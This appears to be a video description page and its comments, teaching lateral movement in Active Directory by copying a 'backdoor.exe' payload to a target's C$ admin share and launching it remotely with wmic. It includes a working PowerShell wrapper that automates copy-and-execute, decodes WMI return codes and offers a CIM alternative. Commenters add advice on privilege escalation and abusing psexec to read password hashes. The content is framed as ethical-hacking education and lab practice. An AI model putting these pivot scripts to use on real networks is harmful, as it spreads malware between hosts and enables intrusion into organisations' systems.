How to Pivot (Lateral Movement) in Active Directory Using WMIC
- Published: 1 Aug 2024
- Learn how to pivot hosts using WMIC.
Command to copy the executable to the target's admin share (requires local admin rights on the target):
copy payload \\target\c$
(example: copy backdoor.exe \\192.168.1.100\c$)
============================================
Command to execute the payload on the target. Give the path as the target sees it, not a UNC path back to the share: the process WMI creates runs under a network-logon token, which cannot re-authenticate to \\target\c$ (the double-hop problem).
wmic /node:"target" process call create "C:\payload"
(example: wmic /node:"192.168.1.100" process call create "C:\backdoor.exe")
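The copy-then-execute pivot above, as an added PowerShell example (not code from the video or its description) with the checks the two raw commands skip: it verifies that the C$ share is reachable before copying, launches the payload by its local path on the target, and decodes the ReturnValue that wmic prints from Win32_Process.Create. The target address, payload path and C$ share are assumed lab values you control; local admin on the target is assumed, and the function and parameter names are this example's own.

```powershell
# Added example (not from the video): copy a payload to the target's C$ share
# and launch it with WMIC, checking each step. Assumed lab values: $Target,
# $Payload and the C$ admin share; you already hold local admin on the target.
function Invoke-WmicPivot {
    param(
        [Parameter(Mandatory)] [string] $Target,    # hostname or IP of the lab target
        [Parameter(Mandatory)] [string] $Payload,   # local path of the executable to copy
        [string] $RemoteSubDir = 'Windows\Temp'     # directory under C:\ on the target
    )

    $leaf       = Split-Path -Leaf $Payload
    $sharePath  = "\\$Target\C`$\$RemoteSubDir"     # directory as seen from our host
    $targetPath = "C:\$RemoteSubDir\$leaf"          # same file as the target sees it

    # 1. Reaching C$ needs local admin on the target. If this fails you get
    #    "Access is denied" here and from WMI as well; domain admin is not required.
    if (-not (Test-Path -Path $sharePath)) {
        throw "Cannot reach $sharePath; check that you are local admin on $Target"
    }
    Copy-Item -Path $Payload -Destination $sharePath -Force

    # 2. Launch it with WMIC, using the path as the target sees it. The process
    #    WMI creates runs under a network-logon token, which cannot re-authenticate
    #    to a UNC share such as \\target\c$ (the double-hop problem).
    $output = & wmic.exe /node:"$Target" process call create "$targetPath" 2>&1 | Out-String

    # 3. wmic prints 'ReturnValue = N;' and 'ProcessId = N;' from Win32_Process.Create.
    $codes = @{ 0 = 'Success'; 2 = 'Access denied'; 3 = 'Insufficient privilege'
                8 = 'Unknown failure'; 9 = 'Path not found'; 21 = 'Invalid parameter' }
    $rvMatch  = [regex]::Match($output, 'ReturnValue\s*=\s*(\d+)')
    $pidMatch = [regex]::Match($output, 'ProcessId\s*=\s*(\d+)')
    if (-not $rvMatch.Success) {
        throw "Unexpected wmic output:`n$output"
    }
    $rv      = [int] $rvMatch.Groups[1].Value
    $meaning = if ($codes.ContainsKey($rv)) { $codes[$rv] } else { 'Other' }
    $procId  = if ($pidMatch.Success) { [int] $pidMatch.Groups[1].Value } else { $null }

    [pscustomobject]@{
        Target      = $Target
        RemotePath  = $targetPath
        ReturnValue = $rv
        Meaning     = $meaning
        ProcessId   = $procId
    }
}

# wmic.exe is deprecated and missing on some current Windows builds. The same
# Win32_Process.Create call through CIM returns ReturnValue and ProcessId as
# properties instead of text that has to be parsed:
function Invoke-CimPivot {
    param(
        [Parameter(Mandatory)] [string] $Target,
        [Parameter(Mandatory)] [string] $TargetPath   # e.g. C:\Windows\Temp\backdoor.exe
    )
    Invoke-CimMethod -ComputerName $Target -ClassName Win32_Process -MethodName Create `
        -Arguments @{ CommandLine = $TargetPath }
}

# Usage (lab values):
# Invoke-WmicPivot -Target 192.168.1.100 -Payload C:\Users\john.doe\backdoor.exe
# Invoke-CimPivot  -Target 192.168.1.100 -TargetPath C:\Windows\Temp\backdoor.exe
```

A ReturnValue of 2 or 3 with a reachable share usually means the account is not a local administrator on the target; 9 means the path given to Create does not exist on the target, which is what you see when the copy step was skipped or landed in a different directory.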
Link to FREE windows 10, Windows server images for practice:
www.microsoft.com/en-us/evalc...
Link for Kali Linux:
www.kali.org/get-kali/
DISCLAIMER
All material provided in this video and on this channel is intended for informational/educational purposes only and should not be performed unless you have permission to do so. These videos are to be performed within a virtual lab for ethical hacking education only. I am not responsible for any misuse, damages, and/or loss of data due to misuse of this information.
There is a very limited number of content creators out there, which makes what you do even more important. Thank you for all that you do.
Nice work, very informative.
Wow, this was amazing!! I have been struggling with pivoting and have gone through a lot of resources just to end up even more confused 😅... but your video made things straight, and this technique is going to be part of my arsenal for a very long time. Thank you for the work that you do; it is quite inspiring ❤️
Thank you for the kind words!
Amazing!!! Why don't you make a Udemy course and get more benefit!
Setup.exe is on your desktop and you copy the file from the shell? How did you do that?
The Setup.exe is already at C:\Users\John.doe, that's why he could easily copy it from the Windows client to the DC. Most IT departments have that locked so that files are only open to read, so that's why file shares which everyone can read/write/execute are really important to find as a vulnerability.
When I use wmic /node:"Windows Server IP" process call create "\\Windows Server IP\c$\backdoor.exe", I get "Access is denied".
I believe you have to be a domain admin. Typically, when making adjustments to any host machine on a domain, you'll need to be a domain admin; this is where privilege escalation comes in. Once you obtain admin status, you can then set up persistence and easily pivot.
@officialexploitacademy thanks for your advice
@officialexploitacademy Okay, granting local admin perms on a Windows host isn't that hard; there are a few exploits, mostly in unpatched Windows versions. Much easier with physical access. But even if you get local admin perms, you are not domain admin.
@jannik2898 That's why, when you have hacked a computer, you try to get as much information as possible and also abuse psexec to get the permission to read the hashes. Then you can start doing the damage you wanna do.